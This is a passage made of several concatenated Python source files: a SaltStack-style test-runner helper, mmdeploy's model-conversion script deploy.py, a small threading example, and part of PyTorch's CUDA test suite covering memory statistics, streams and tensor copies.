os.chmod(path, stat.S_IRWXU)
func(path)
for dirname in (
TMP,
RUNTIME_VARS.TMP_STATE_TREE,
RUNTIME_VARS.TMP_PILLAR_TREE,
RUNTIME_VARS.TMP_PRODENV_STATE_TREE,
):
if os.path.isdir(dirname):
try:
shutil.rmtree(six.text_type(dirname), onerror=remove_readonly)
except Exception: # pylint: disable=broad-except
log.exception("Failed to remove directory: %s", dirname)
def wait_for_jid(self, targets, jid, timeout=120):
time.sleep(1) # Allow some time for minions to accept jobs
now = datetime.now()
expire = now + timedelta(seconds=timeout)
job_finished = False
while now <= expire:
running = self.__client_job_running(targets, jid)
sys.stdout.write(
"\r{0}\r".format(
" " * getattr(self.parser.options, "output_columns", PNUM)
)
)
if not running and job_finished is False:
# Let's not have false positives and wait one more seconds
job_finished = True
elif not running and job_finished is True:
return True
elif running and job_finished is True:
job_finished = False
if job_finished is False:
sys.stdout.write(
" * {LIGHT_YELLOW}[Quit in {0}]{ENDC} Waiting for {1}".format(
"{0}".format(expire - now).rsplit(".", 1)[0],
", ".join(running),
**self.colors
)
)
sys.stdout.flush()
time.sleep(1)
now = datetime.now()
else: # pylint: disable=W0120
sys.stdout.write(
"\n {LIGHT_RED}*{ENDC} ERROR: Failed to get information "
"back\n".format(**self.colors)
)
sys.stdout.flush()
return False
def __client_job_running(self, targets, jid):
running = self.client.cmd(list(targets), "saltutil.running", tgt_type="list")
return [k for (k, v) in six.iteritems(running) if v and v[0]["jid"] == jid]
def sync_minion_modules_(self, modules_kind, targets, timeout=None):
if not timeout:
timeout = 120
# Let's sync all connected minions
print(
" {LIGHT_BLUE}*{ENDC} Syncing minion's {1} "
"(saltutil.sync_{1})".format(
", ".join(targets), modules_kind, **self.colors
)
)
syncing = set(targets)
jid_info = self.client.run_job(
list(targets),
"saltutil.sync_{0}".format(modules_kind),
tgt_type="list",
timeout=999999999999999,
)
if self.wait_for_jid(targets, jid_info["jid"], timeout) is False:
print(
" {LIGHT_RED}*{ENDC} WARNING: Minions failed to sync {0}. "
"Tests requiring these {0} WILL fail".format(
modules_kind, **self.colors
)
)
raise SystemExit()
while syncing:
rdata = self.client.get_full_returns(jid_info["jid"], syncing, 1)
if rdata:
for name, output in six.iteritems(rdata):
if not output["ret"]:
# Already synced!?
syncing.remove(name)
continue
if isinstance(output["ret"], six.string_types):
# An errors has occurred
print(
" {LIGHT_RED}*{ENDC} {0} Failed to sync {2}: "
"{1}".format(
name, output["ret"], modules_kind, **self.colors
)
)
return False
print(
" {LIGHT_GREEN}*{ENDC} Synced {0} {2}: "
"{1}".format(
name, ", ".join(output["ret"]), modules_kind, **self.colors
)
)
# Synced!
try:
syncing.remove(name)
except KeyError:
print(
" {LIGHT_RED}*{ENDC} {0} already synced??? "
"{1}".format(name, output, **self.colors)
)
return True
def sync_minion_states(self, targets, timeout=None):
salt.utils.process.appendproctitle("SyncMinionStates")
self.sync_minion_modules_("states", targets, timeout=timeout)
def sync_minion_modules(self, targets, timeout=None):
salt.utils.process.appendproctitle("SyncMinionModules")
self.sync_minion_modules_("modules", targets, timeout=timeout)
def sync_minion_grains(self, targets, timeout=None):
salt.utils.process.appendproctitle("SyncMinionGrains")
self.sync_minion_modules_("grains", targets, timeout=timeout)
def wait_for_minions(self, start, timeout, sleep=5):
"""
Ensure all minions and masters (including sub-masters) are connected.
"""
while True:
try:
ret = self.client.run_job("*", "test.ping")
except salt.exceptions.SaltClientError:
ret = None
if ret and "minions" not in ret:
continue
if ret and sorted(ret["minions"]) == sorted(self.minion_targets):
break
if time.time() - start >= timeout:
raise RuntimeError("Ping Minions Failed")
time.sleep(sleep)
|
deploy.py
|
# Copyright (c) OpenMMLab. All rights reserved.
import argparse
import logging
import os.path as osp
from functools import partial
import mmcv
import torch.multiprocessing as mp
from torch.multiprocessing import Process, set_start_method
from mmdeploy.apis import (create_calib_table, extract_model,
get_predefined_partition_cfg, torch2onnx,
visualize_model)
from mmdeploy.utils import (Backend, get_backend, get_calib_filename,
get_ir_config, get_model_inputs, get_onnx_config,
get_partition_config, get_root_logger, load_config,
target_wrapper)
from mmdeploy.utils.export_info import dump_info
def parse_args():
parser = argparse.ArgumentParser(description='Export model to backends.')
parser.add_argument('deploy_cfg', help='deploy config path')
parser.add_argument('model_cfg', help='model config path')
parser.add_argument('checkpoint', help='model checkpoint path')
parser.add_argument('img', help='image used to convert model model')
parser.add_argument(
'--test-img', default=None, help='image used to test model')
parser.add_argument('--work-dir', help='the dir to save logs and models')
parser.add_argument(
'--calib-dataset-cfg',
help='dataset config path used to calibrate.',
default=None)
parser.add_argument(
'--device', help='device used for conversion', default='cpu')
parser.add_argument(
'--log-level',
help='set log level',
default='INFO',
choices=list(logging._nameToLevel.keys()))
parser.add_argument(
'--show', action='store_true', help='Show detection outputs')
parser.add_argument(
'--dump-info', action='store_true', help='Output information for SDK')
args = parser.parse_args()
return args
def create_process(name, target, args, kwargs, ret_value=None):
logger = get_root_logger()
logger.info(f'{name} start.')
log_level = logger.level
wrap_func = partial(target_wrapper, target, log_level, ret_value)
process = Process(target=wrap_func, args=args, kwargs=kwargs)
process.start()
process.join()
if ret_value is not None:
if ret_value.value != 0:
logger.error(f'{name} failed.')
exit()
else:
logger.info(f'{name} success.')
def main():
args = parse_args()
set_start_method('spawn')
logger = get_root_logger()
logger.setLevel(args.log_level)
deploy_cfg_path = args.deploy_cfg
model_cfg_path = args.model_cfg
checkpoint_path = args.checkpoint
# load deploy_cfg
deploy_cfg, model_cfg = load_config(deploy_cfg_path, model_cfg_path)
# create work_dir if not
mmcv.mkdir_or_exist(osp.abspath(args.work_dir))
if args.dump_info:
dump_info(deploy_cfg, model_cfg, args.work_dir, pth=checkpoint_path)
ret_value = mp.Value('d', 0, lock=False)
# convert onnx
onnx_save_file = get_onnx_config(deploy_cfg)['save_file']
create_process(
'torch2onnx',
target=torch2onnx,
args=(args.img, args.work_dir, onnx_save_file, deploy_cfg_path,
model_cfg_path, checkpoint_path),
kwargs=dict(device=args.device),
ret_value=ret_value)
# convert backend
onnx_files = [osp.join(args.work_dir, onnx_save_file)]
# partition model
partition_cfgs = get_partition_config(deploy_cfg)
if partition_cfgs is not None:
if 'partition_cfg' in partition_cfgs:
partition_cfgs = partition_cfgs.get('partition_cfg', None)
else:
assert 'type' in partition_cfgs
partition_cfgs = get_predefined_partition_cfg(
deploy_cfg, partition_cfgs['type'])
origin_onnx_file = onnx_files[0]
onnx_files = []
for partition_cfg in partition_cfgs:
save_file = partition_cfg['save_file']
save_path = osp.join(args.work_dir, save_file)
start = partition_cfg['start']
end = partition_cfg['end']
dynamic_axes = partition_cfg.get('dynamic_axes', None)
create_process(
f'partition model {save_file} with start: {start}, end: {end}',
extract_model,
args=(origin_onnx_file, start, end),
kwargs=dict(dynamic_axes=dynamic_axes, save_file=save_path),
ret_value=ret_value)
onnx_files.append(save_path)
# calib data
calib_filename = get_calib_filename(deploy_cfg)
if calib_filename is not None:
calib_path = osp.join(args.work_dir, calib_filename)
create_process(
'calibration',
create_calib_table,
args=(calib_path, deploy_cfg_path, model_cfg_path,
checkpoint_path),
kwargs=dict(
dataset_cfg=args.calib_dataset_cfg,
dataset_type='val',
device=args.device),
ret_value=ret_value)
backend_files = onnx_files
# convert backend
backend = get_backend(deploy_cfg)
if backend == Backend.TENSORRT:
model_params = get_model_inputs(deploy_cfg)
assert len(model_params) == len(onnx_files)
from mmdeploy.apis.tensorrt import is_available as trt_is_available
from mmdeploy.apis.tensorrt import onnx2tensorrt
assert trt_is_available(
), 'TensorRT is not available,' \
+ ' please install TensorRT and build TensorRT custom ops first.'
backend_files = []
for model_id, model_param, onnx_path in zip(
range(len(onnx_files)), model_params, onnx_files):
onnx_name = osp.splitext(osp.split(onnx_path)[1])[0]
save_file = model_param.get('save_file', onnx_name + '.engine')
partition_type = 'end2end' if partition_cfgs is None \
else onnx_name
create_process(
f'onnx2tensorrt of {onnx_path}',
target=onnx2tensorrt,
args=(args.work_dir, save_file, model_id, deploy_cfg_path,
onnx_path),
kwargs=dict(device=args.device, partition_type=partition_type),
ret_value=ret_value)
backend_files.append(osp.join(args.work_dir, save_file))
elif backend == Backend.NCNN:
from mmdeploy.apis.ncnn import is_available as is_available_ncnn
if not is_available_ncnn():
logger.error('ncnn support is not available.')
exit(-1)
from mmdeploy.apis.ncnn import get_output_model_file, onnx2ncnn
backend_files = []
for onnx_path in onnx_files:
model_param_path, model_bin_path = get_output_model_file(
onnx_path, args.work_dir)
create_process(
f'onnx2ncnn with {onnx_path}',
target=onnx2ncnn,
args=(onnx_path, model_param_path, model_bin_path),
kwargs=dict(),
ret_value=ret_value)
backend_files += [model_param_path, model_bin_path]
elif backend == Backend.OPENVINO:
from mmdeploy.apis.openvino import \
is_available as is_available_openvino
assert is_available_openvino(), \
'OpenVINO is not available, please install OpenVINO first.'
from mmdeploy.apis.openvino import (get_input_info_from_cfg,
get_output_model_file,
onnx2openvino)
openvino_files = []
for onnx_path in onnx_files:
model_xml_path = get_output_model_file(onnx_path, args.work_dir)
input_info = get_input_info_from_cfg(deploy_cfg)
output_names = get_ir_config(deploy_cfg).output_names
create_process(
f'onnx2openvino with {onnx_path}',
target=onnx2openvino,
args=(input_info, output_names, onnx_path, args.work_dir),
kwargs=dict(),
ret_value=ret_value)
openvino_files.append(model_xml_path)
backend_files = openvino_files
elif backend == Backend.PPLNN:
from mmdeploy.apis.pplnn import is_available as is_available_pplnn
assert is_available_pplnn(), \
'PPLNN is not available, please install PPLNN first.'
from mmdeploy.apis.pplnn import onnx2pplnn
pplnn_files = []
for onnx_path in onnx_files:
algo_file = onnx_path.replace('.onnx', '.json')
model_inputs = get_model_inputs(deploy_cfg)
assert 'opt_shape' in model_inputs, 'Expect opt_shape ' \
'in deploy config for PPLNN'
# PPLNN accepts only 1 input shape for optimization,
# may get changed in the future
input_shapes = [model_inputs.opt_shape]
create_process(
f'onnx2pplnn with {onnx_path}',
target=onnx2pplnn,
args=(algo_file, onnx_path),
kwargs=dict(device=args.device, input_shapes=input_shapes),
ret_value=ret_value)
pplnn_files += [onnx_path, algo_file]
backend_files = pplnn_files
if args.test_img is None:
args.test_img = args.img
# visualize model of the backend
create_process(
f'visualize {backend.value} model',
target=visualize_model,
args=(model_cfg_path, deploy_cfg_path, backend_files, args.test_img,
args.device),
kwargs=dict(
backend=backend,
output_file=osp.join(args.work_dir, f'output_{backend.value}.jpg'),
show_result=args.show),
ret_value=ret_value)
# visualize pytorch model
create_process(
'visualize pytorch model',
target=visualize_model,
args=(model_cfg_path, deploy_cfg_path, [checkpoint_path],
args.test_img, args.device),
kwargs=dict(
backend=Backend.PYTORCH,
output_file=osp.join(args.work_dir, 'output_pytorch.jpg'),
show_result=args.show),
ret_value=ret_value)
logger.info('All process success.')
if __name__ == '__main__':
main()
|
creat_threading_function.py
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
# Author:Lyon
import threading
import time
def func(name):
print("I am %s" % name)
time.sleep(2)
if __name__ == '__main__':
t1 = threading.Thread(target=func, args=("Lyon",))
t2 = threading.Thread(target=func, args=("Kenneth",))
print(t1.isAlive)
print(t1.daemon)
print(t1.ident)
print(t1.name)
t1.start()
t2.start()
t1.join()
print(t1.getName())
print(t2.getName())
|
test_cuda.py
|
# Owner(s): ["module: cuda"]
from itertools import repeat, chain, product
from typing import NamedTuple
import collections
import contextlib
import ctypes
import gc
import io
import pickle
import queue
import sys
import tempfile
import threading
import unittest
import torch
import torch.cuda
import torch.cuda.comm as comm
from torch.nn.parallel import scatter_gather
from torch.utils.checkpoint import checkpoint_sequential
from torch._six import inf, nan
from test_torch import AbstractTestCases
from torch.testing._internal.common_methods_invocations import tri_tests_args, tri_large_tests_args, \
_compare_trilu_indices, _compare_large_trilu_indices
from torch.testing._internal.common_utils import TestCase, freeze_rng_state, run_tests, \
NO_MULTIPROCESSING_SPAWN, skipIfRocm, load_tests, IS_REMOTE_GPU, IS_SANDCASTLE, IS_WINDOWS, \
slowTest, skipCUDANonDefaultStreamIf, skipCUDAMemoryLeakCheckIf, TEST_WITH_ROCM, TEST_NUMPY, \
get_cycles_per_ms
from torch.testing._internal.autocast_test_lists import AutocastTestLists
# load_tests from common_utils is used to automatically filter tests for
# sharding on sandcastle. This line silences flake warnings
load_tests = load_tests
# We cannot import TEST_CUDA and TEST_MULTIGPU from torch.testing._internal.common_cuda here,
# because if we do that, the TEST_CUDNN line from torch.testing._internal.common_cuda will be executed
# multiple times as well during the execution of this test suite, and it will
# cause CUDA OOM error on Windows.
TEST_CUDA = torch.cuda.is_available()
TEST_MULTIGPU = TEST_CUDA and torch.cuda.device_count() >= 2
if not TEST_CUDA:
print('CUDA not available, skipping tests', file=sys.stderr)
TestCase = object # noqa: F811
TEST_LARGE_TENSOR = TEST_CUDA
TEST_MEDIUM_TENSOR = TEST_CUDA
TEST_CUDNN = TEST_CUDA
TEST_BF16 = False
if TEST_CUDA:
torch.ones(1).cuda() # initialize cuda context
TEST_CUDNN = TEST_CUDA and (TEST_WITH_ROCM or
torch.backends.cudnn.is_acceptable(torch.tensor(1., device=torch.device('cuda:0'))))
TEST_LARGE_TENSOR = torch.cuda.get_device_properties(0).total_memory >= 12e9
TEST_MEDIUM_TENSOR = torch.cuda.get_device_properties(0).total_memory >= 6e9
TEST_BF16 = torch.cuda.is_bf16_supported()
types = [
torch.FloatTensor,
torch.DoubleTensor,
torch.LongTensor,
torch.IntTensor,
torch.ShortTensor,
torch.CharTensor,
torch.ByteTensor,
torch.HalfTensor,
]
def make_sparse_tensor(t, n, *sizes):
assert t.is_sparse
tensor = t()
i = tensor._indices()
i = i.new(len(sizes), n).copy_(
torch.cat([torch.LongTensor(1, n).random_(s) for s in sizes], 0))
v = tensor._values()
v = v.new(n).copy_(torch.randn(n))
return t(i, v, torch.Size(sizes))
_cycles_per_ms = None
class TestCuda(TestCase):
_do_cuda_memory_leak_check = True
_do_cuda_non_default_stream = True
FIFTY_MIL_CYCLES = 50000000
def setUp(self):
super(TestCuda, self).setUp()
self.autocast_lists = AutocastTestLists(torch.device('cuda:0'))
def tearDown(self):
del self.autocast_lists
super(TestCuda, self).tearDown()
def _check_memory_stat_consistency(self):
snapshot = torch.cuda.memory_snapshot()
expected_each_device = collections.defaultdict(lambda: collections.defaultdict(int))
for segment in snapshot:
expected = expected_each_device[segment["device"]]
pool_str = segment["segment_type"] + "_pool"
expected["segment.all.current"] += 1
expected["segment." + pool_str + ".current"] += 1
expected["allocated_bytes.all.current"] += segment["allocated_size"]
expected["allocated_bytes." + pool_str + ".current"] += segment["allocated_size"]
expected["reserved_bytes.all.current"] += segment["total_size"]
expected["reserved_bytes." + pool_str + ".current"] += segment["total_size"]
expected["active_bytes.all.current"] += segment["active_size"]
expected["active_bytes." + pool_str + ".current"] += segment["active_size"]
is_split = len(segment["blocks"]) > 1
for block in segment["blocks"]:
if block["state"] == "active_allocated":
expected["allocation.all.current"] += 1
expected["allocation." + pool_str + ".current"] += 1
if block["state"].startswith("active_"):
expected["active.all.current"] += 1
expected["active." + pool_str + ".current"] += 1
if block["state"] == "inactive" and is_split:
expected["inactive_split.all.current"] += 1
expected["inactive_split." + pool_str + ".current"] += 1
expected["inactive_split_bytes.all.current"] += block["size"]
expected["inactive_split_bytes." + pool_str + ".current"] += block["size"]
for device, expected in expected_each_device.items():
stats = torch.cuda.memory_stats(device)
for k, v in expected.items():
self.assertEqual(v, stats[k])
@staticmethod
def _test_memory_stats_generator(self, device=None, N=35):
if device is None:
device = torch.cuda.current_device()
m0 = torch.cuda.memory_allocated(device)
last_m_arr = [torch.cuda.memory_allocated(device)]
max_m_arr = [torch.cuda.max_memory_allocated(device)]
last_r_arr = [torch.cuda.memory_reserved(device)]
max_r_arr = [torch.cuda.max_memory_reserved(device)]
def alloc(*size):
with torch.cuda.device(device):
# NOTE: do **not** use methods that can have additional
# memory overhead, e.g., inplace random sampling methods.
# they can leave some memory occupied even after being
# deallocated, e.g., initialized RNG state, causing some
# memory checks below to fail.
return torch.cuda.FloatTensor(*size)
def assert_change(comp=1, empty_cache=False, reset_peak=False):
# comp > 0: increased
# comp = 0: equal
# comp < 0: decreased
new_m = torch.cuda.memory_allocated(device)
new_max_m = torch.cuda.max_memory_allocated(device)
if comp > 0:
self.assertGreater(new_m, last_m_arr[0])
elif comp < 0:
self.assertLess(new_m, last_m_arr[0])
else:
self.assertEqual(new_m, last_m_arr[0])
self.assertLessEqual(new_m, new_max_m)
self.assertGreaterEqual(new_max_m, max_m_arr[0])
last_m_arr[0] = new_m
max_m_arr[0] = new_max_m
new_r = torch.cuda.memory_reserved(device)
new_max_r = torch.cuda.max_memory_reserved(device)
# emptying cache may happen (due to allocation or empty_cache), so
# we can't assert new_c >= last_c
self.assertLessEqual(new_r, new_max_r)
self.assertGreaterEqual(new_max_r, max_r_arr[0])
last_r_arr[0] = new_r
max_r_arr[0] = new_max_r
if empty_cache:
torch.cuda.empty_cache()
new_r = torch.cuda.memory_reserved(device)
new_max_r = torch.cuda.max_memory_reserved(device)
self.assertLessEqual(new_r, last_r_arr[0])
self.assertLessEqual(new_r, new_max_r)
self.assertEqual(new_max_r, max_r_arr[0])
last_r_arr[0] = new_r
if reset_peak:
torch.cuda.reset_peak_memory_stats(device)
self.assertEqual(torch.cuda.memory_allocated(device), last_m_arr[0])
self.assertEqual(torch.cuda.max_memory_allocated(device), last_m_arr[0])
max_m_arr[0] = last_m_arr[0]
self.assertEqual(torch.cuda.memory_reserved(device), last_r_arr[0])
self.assertEqual(torch.cuda.max_memory_reserved(device), last_r_arr[0])
max_r_arr[0] = last_r_arr[0]
assert_change(0)
assert_change(0, reset_peak=True)
assert_change(0, empty_cache=True)
assert_change(0, reset_peak=True)
assert_change(0)
yield
tensors1 = [alloc(1), alloc(10, 20), alloc(200, 300, 2000)]
m1 = torch.cuda.memory_allocated(device)
assert_change(1)
yield
tensors2 = []
for i in range(1, int(N / 2) + 1):
# small ones
tensors2.append(alloc(i, i * 4))
assert_change(1)
yield
for i in range(5, int(N / 2) + 5):
# large ones
tensors2.append(alloc(i, i * 7, i * 9, i * 11))
assert_change(1, reset_peak=(i % 2 == 0))
yield
tensors2.append(alloc(0, 0, 0))
assert_change(0)
yield
permute = []
for i in torch.randperm(len(tensors2)):
permute.append(tensors2[i])
assert_change(0)
yield
del tensors2
assert_change(0)
yield
tensors2 = permute
assert_change(0)
yield
del permute
assert_change(0, reset_peak=True)
yield
for i in range(int(N / 2)):
x = tensors2[i].numel()
del tensors2[i]
assert_change(-x) # in case that tensors2[i] is empty
yield
for i in range(2, int(2 * N / 3) + 2):
tensors2.append(alloc(i, i * 3, i * 8))
assert_change(1)
yield
del tensors2
assert_change(-1, reset_peak=True)
assert_change(0)
self.assertEqual(torch.cuda.memory_allocated(device), m1)
yield True
del tensors1
assert_change(-1, reset_peak=True)
self.assertEqual(torch.cuda.memory_allocated(device), m0)
# test empty_cache and reset_peak
assert_change(0, empty_cache=True)
assert_change(0, reset_peak=True)
def test_cudart_register(self):
t = torch.ones(20)
self.assertFalse(t.is_pinned())
cudart = torch.cuda.cudart()
r = cudart.cudaHostRegister(t.data_ptr(), t.numel() * t.element_size(), 0)
self.assertEqual(r, 0)
self.assertTrue(t.is_pinned())
r = cudart.cudaHostUnregister(t.data_ptr())
self.assertEqual(r, 0)
self.assertFalse(t.is_pinned())
def test_memory_stats(self):
gc.collect()
torch.cuda.empty_cache()
for _ in self._test_memory_stats_generator(self):
self._check_memory_stat_consistency()
def test_memory_allocation(self):
gc.collect()
torch.cuda.empty_cache()
mem = None
size = 1
prev = 0
try:
prev = torch.cuda.memory_allocated()
mem = torch.cuda.caching_allocator_alloc(size)
self.assertGreater(torch.cuda.memory_allocated(), prev)
finally:
if mem is not None:
torch.cuda.caching_allocator_delete(mem)
self.assertEqual(torch.cuda.memory_allocated(), prev)
def test_check_error(self):
# Assert this call doesn't raise.
torch.cuda.check_error(0)
with self.assertRaisesRegex(torch.cuda.CudaError,
"out of memory|hipErrorOutOfMemory"):
torch.cuda.check_error(2)
def test_cuda_get_device_name(self):
# Testing the behaviour with None as an argument
current_device = torch.cuda.current_device()
current_device_name = torch.cuda.get_device_name(current_device)
device_name_None = torch.cuda.get_device_name(None)
self.assertEqual(current_device_name, device_name_None)
# Testing the behaviour for No argument
device_name_no_argument = torch.cuda.get_device_name()
self.assertEqual(current_device_name, device_name_no_argument)
def test_cuda_get_device_capability(self):
# Testing the behaviour with None as an argument
current_device = torch.cuda.current_device()
current_device_capability = torch.cuda.get_device_capability(current_device)
device_capability_None = torch.cuda.get_device_capability(None)
self.assertEqual(current_device_capability, device_capability_None)
# Testing the behaviour for No argument
device_capability_no_argument = torch.cuda.get_device_capability()
self.assertEqual(current_device_capability, device_capability_no_argument)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_memory_stats_multigpu(self):
# advance a generator with a end flag
def advance(gen, end):
if not end:
try:
next(gen)
except StopIteration:
end = True
return end
# interlace
torch.cuda.empty_cache()
gen0 = self._test_memory_stats_generator(self, device='cuda:0', N=35)
gen1 = self._test_memory_stats_generator(self, device=torch.device('cuda:1'), N=35)
end0 = end1 = False
while not (end0 and end1):
end0 = advance(gen0, end0)
end1 = advance(gen1, end1)
# semi-random order
torch.cuda.empty_cache()
gen0 = self._test_memory_stats_generator(self, device=0, N=35)
gen1 = self._test_memory_stats_generator(self, device=torch.device('cuda:1'), N=35)
end0 = end1 = False
while not (end0 and end1):
end0 = advance(gen0, end0)
if not end0:
gen1_max_times = torch.LongTensor(1).random_(0, 3)[0]
else:
gen1_max_times = inf
t = 0
while t < gen1_max_times and not end1:
end1 = advance(gen1, end1)
t += 1
def test_out_of_memory(self):
tensor = torch.zeros(1024, device='cuda')
with self.assertRaisesRegex(RuntimeError, "Tried to allocate 800000000.00 GiB"):
torch.empty(1024 * 1024 * 1024 * 800000000, dtype=torch.int8, device='cuda')
with self.assertRaisesRegex(RuntimeError, "Tried to allocate more than 1EB memory"):
torch.empty(1024 * 1024 * 1024 * 8000000000, dtype=torch.int8, device='cuda')
# ensure out of memory error doesn't disturb subsequent kernel
tensor.fill_(1)
self.assertTrue((tensor == 1).all())
def test_set_per_process_memory_fraction(self):
# test invalid fraction value.
with self.assertRaisesRegex(TypeError, "Invalid type"):
torch.cuda.set_per_process_memory_fraction(int(1))
with self.assertRaisesRegex(ValueError, "Invalid fraction value"):
torch.cuda.set_per_process_memory_fraction(-0.1)
with self.assertRaisesRegex(ValueError, "Invalid fraction value"):
torch.cuda.set_per_process_memory_fraction(2.0)
tensor = torch.zeros(1024, device='cuda')
torch.cuda.empty_cache()
total_memory = torch.cuda.get_device_properties(0).total_memory
torch.cuda.set_per_process_memory_fraction(0.5, 0)
# test 0.499 allocation is ok.
application = int(total_memory * 0.499) - torch.cuda.max_memory_reserved()
tmp_tensor = torch.empty(application, dtype=torch.int8, device='cuda')
del tmp_tensor
torch.cuda.empty_cache()
application = int(total_memory * 0.5)
# it will get OOM when try to allocate more than half memory.
with self.assertRaisesRegex(RuntimeError, "out of memory"):
torch.empty(application, dtype=torch.int8, device='cuda')
# ensure out of memory error doesn't disturb subsequent kernel
tensor.fill_(1)
self.assertTrue((tensor == 1).all())
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_autogpu(self):
x = torch.randn(5, 5).cuda()
y = torch.randn(5, 5).cuda()
self.assertEqual(x.get_device(), 0)
self.assertEqual(x.get_device(), 0)
with torch.cuda.device(1):
z = torch.randn(5, 5).cuda()
self.assertEqual(z.get_device(), 1)
q = x.add(y)
self.assertEqual(q.get_device(), 0)
w = torch.randn(5, 5).cuda()
self.assertEqual(w.get_device(), 1)
self.assertEqual(y.cuda().get_device(), 1)
z = z.cuda()
self.assertEqual(z.get_device(), 0)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_new(self):
x = torch.randn(3, 3).cuda()
self.assertEqual(x.new([0, 1, 2]).get_device(), 0)
self.assertEqual(x.new([0, 1, 2], device=1).get_device(), 1)
with torch.cuda.device(1):
self.assertEqual(x.new([0, 1, 2]).get_device(), 0)
self.assertEqual(x.new([0, 1, 2], device=1).get_device(), 1)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_copy_device(self):
x = torch.randn(5, 5).cuda()
with torch.cuda.device(1):
y = x.cuda()
self.assertEqual(y.get_device(), 1)
self.assertIs(y.cuda(), y)
z = y.cuda(0)
self.assertEqual(z.get_device(), 0)
self.assertIs(z.cuda(0), z)
x = torch.randn(5, 5)
with torch.cuda.device(1):
y = x.cuda()
self.assertEqual(y.get_device(), 1)
self.assertIs(y.cuda(), y)
z = y.cuda(0)
self.assertEqual(z.get_device(), 0)
self.assertIs(z.cuda(0), z)
def _test_copy_sync_current_stream(self, x, y):
x_plus_one = x + 1
s0 = torch.cuda.Stream(device=x.device)
s1 = torch.cuda.Stream(device=y.device)
s2 = torch.cuda.Stream(device=x.device)
s3 = torch.cuda.Stream(device=y.device)
# same dst stream different src streams
with torch.cuda.stream(s0):
torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
with torch.cuda.stream(s1):
y.copy_(x_plus_one)
with torch.cuda.stream(s2), torch.cuda.stream(s1):
y.copy_(x)
s1.synchronize()
# The copy() is synchronized on the current streams of both src and dst.
# In the above test, the _sleep() op on s0 will not block the copy() on
# s2, but both copies are synchronized on s1 in the dst device. Hence,
# x is copied to y after x_plus_one is copied to y. If x and y are on
# the same device, both copy() ops are synchronized on s1.
self.assertEqual(y, x)
# same src stream different dst streams
with torch.cuda.stream(s1):
torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
with torch.cuda.stream(s0):
y.copy_(x_plus_one)
with torch.cuda.stream(s3), torch.cuda.stream(s0):
y.copy_(x)
s0.synchronize()
# Similarly, both copy() ops are synchronized on s0.
self.assertEqual(y, x)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_copy_streams(self):
d0 = torch.device('cuda:0')
x0 = torch.zeros(5, 5, device=d0)
d1 = torch.device('cuda:1')
x1 = torch.zeros(5, 5, device=d1)
self._test_copy_sync_current_stream(x0, x1)
x2 = torch.zeros(5, 5, device=d0)
self._test_copy_sync_current_stream(x0, x2)
def test_copy_non_blocking(self):
def _test_copy_non_blocking(a, b):
event = torch.cuda.Event()
a.copy_(b, non_blocking=True)
event.record()
event.synchronize()
self.assertEqual(a, b)
# 10MB copies
x = torch.ones(10000000, dtype=torch.uint8).cuda()
y = torch.zeros(10000000, dtype=torch.uint8).pin_memory()
_test_copy_non_blocking(x, y)
x = torch.zeros(10000000, dtype=torch.uint8).pin_memory()
y = torch.ones(10000000, dtype=torch.uint8).cuda()
_test_copy_non_blocking(x, y)
def test_to_non_blocking(self):
stream = torch.cuda.current_stream()
def _test_to_non_blocking(a, non_blocking, dst):
torch.cuda.synchronize()
# Pushes an 0.1 second spin to stream so if the copy is non blocking,
# stream will almost surely be active when we query().
torch.cuda._sleep(int(100 * get_cycles_per_ms()))
b = a.to(device=dst, non_blocking=non_blocking)
self.assertEqual(stream.query(), not non_blocking)
stream.synchronize()
self.assertEqual(a, b)
self.assertTrue(b.is_pinned() == (non_blocking and dst == "cpu"))
for dst, try_non_blocking in product(("cuda", "cpu"), (True, False)):
# Creates source on the opposite device from destination.
src = torch.randn(1000000,
device="cuda" if dst == "cpu" else "cpu",
pin_memory=True if dst == "cuda" else False)
_test_to_non_blocking(src, try_non_blocking, dst)
def test_to_cpu_blocking_by_default(self):
src = torch.randn(1000000, device="cuda")
torch.cuda.synchronize()
torch.cuda._sleep(int(100 * get_cycles_per_ms()))
dst = src.to(device="cpu")
self.assertEqual(torch.cuda.current_stream().query(), True)
self.assertEqual(src, dst)
self.assertFalse(dst.is_pinned())
def test_serialization_array_with_storage(self):
x = torch.randn(5, 5).cuda()
y = torch.IntTensor(2, 5).fill_(0).cuda()
q = [x, y, x, y.storage()]
with tempfile.NamedTemporaryFile() as f:
torch.save(q, f)
f.seek(0)
q_copy = torch.load(f)
self.assertEqual(q_copy, q, atol=0, rtol=0)
q_copy[0].fill_(5)
self.assertEqual(q_copy[0], q_copy[2], atol=0, rtol=0)
self.assertTrue(isinstance(q_copy[0], torch.cuda.FloatTensor))
self.assertTrue(isinstance(q_copy[1], torch.cuda.IntTensor))
self.assertTrue(isinstance(q_copy[2], torch.cuda.FloatTensor))
self.assertTrue(isinstance(q_copy[3], torch.storage.TypedStorage))
self.assertTrue(isinstance(q_copy[3]._storage, torch.cuda.UntypedStorage))
q_copy[1].fill_(10)
self.assertEqual(q_copy[3], torch.cuda.IntStorage(10).fill_(10))
def test_cublas_allow_tf32_get_set(self):
orig = torch.backends.cuda.matmul.allow_tf32
self.assertEqual(torch._C._get_cublas_allow_tf32(), orig)
torch.backends.cuda.matmul.allow_tf32 = not orig
self.assertEqual(torch._C._get_cublas_allow_tf32(), not orig)
torch.backends.cuda.matmul.allow_tf32 = orig
def test_cublas_allow_fp16_reduced_precision_reduction_get_set(self):
orig = torch.backends.cuda.matmul.allow_fp16_reduced_precision_reduction
self.assertEqual(torch._C._get_cublas_allow_fp16_reduced_precision_reduction(), orig)
torch.backends.cuda.matmul.allow_fp16_reduced_precision_reduction = not orig
self.assertEqual(torch._C._get_cublas_allow_fp16_reduced_precision_reduction(), not orig)
torch.backends.cuda.matmul.allow_fp16_reduced_precision_reduction = orig
def test_cudnn_allow_tf32_get_set(self):
with torch.backends.cudnn.flags(enabled=None, benchmark=None, deterministic=None, allow_tf32=False):
self.assertFalse(torch.backends.cudnn.allow_tf32)
with torch.backends.cudnn.flags(enabled=None, benchmark=None, deterministic=None, allow_tf32=True):
self.assertTrue(torch.backends.cudnn.allow_tf32)
def test_type_conversions(self):
